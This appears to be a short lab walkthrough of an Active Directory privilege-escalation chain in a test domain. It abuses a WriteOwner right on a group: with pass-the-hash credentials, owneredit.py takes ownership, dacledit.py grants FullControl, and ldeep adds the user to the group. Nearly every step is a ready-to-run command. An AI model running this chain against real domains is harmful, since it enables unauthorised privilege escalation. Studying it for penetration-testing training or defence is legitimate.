WriteOwner on Group (EmpireState -> CentralPark)

• Now with the writeOwner privilege we can change the owner of CentralPark to own the group

• Just like before we will use the impacket fork

ldeep ldap -u Nicolas.Maduro -H ':b3b3717f7d51b37fb325f7e7d048e998' -d NewYork.local -s ldap://192.168.56.10 membersof 'CentralPark'

Read The Owner Permission

owneredit.py -action read -target 'CentralPark' -hashes ':b3b3717f7d51b37fb325f7e7d048e998' NewYork.local/Nicolas.Maduro

Edit The Owner Permission

We are going to give Nicolas maduro owner access to CentralPark Group!

owneredit.py -action write -owner 'Nicolas.Maduro' -target 'CentralPark' -hashes ':b3b3717f7d51b37fb325f7e7d048e998' NewYork.local/Nicolas.Maduro

• And the owner of CentralPark group is now Nicolas.Maduro

• As owner of the group we can now change the acl and give us GenericAll on the group

dacledit.py -action 'write' -rights 'FullControl' -principal Nicolas.Maduro  -target 'CentralPark' 'NewYork.local'/'Nicolas.Maduro' -hashes ':b3b3717f7d51b37fb325f7e7d048e998'

• With GenericAll now we can add Nicolas to the CentrlalPark group

ldeep ldap -u Nicolas.Maduro -H ':b3b3717f7d51b37fb325f7e7d048e998' -d NewYork.local -s ldap://192.168.56.10 add_to_group "CN=Nicolas.Maduro,OU=SugarHill,DC=NewYork,DC=local" "CN=CentralPark,OU=WestSide,DC=NewYork,DC=local"

See Nicolas.Maduro is part of the group now!

ldeep ldap -u Nicolas.Maduro -H ':b3b3717f7d51b37fb325f7e7d048e998' -d NewYork.local -s ldap://192.168.56.10 membersof 'CentralPark'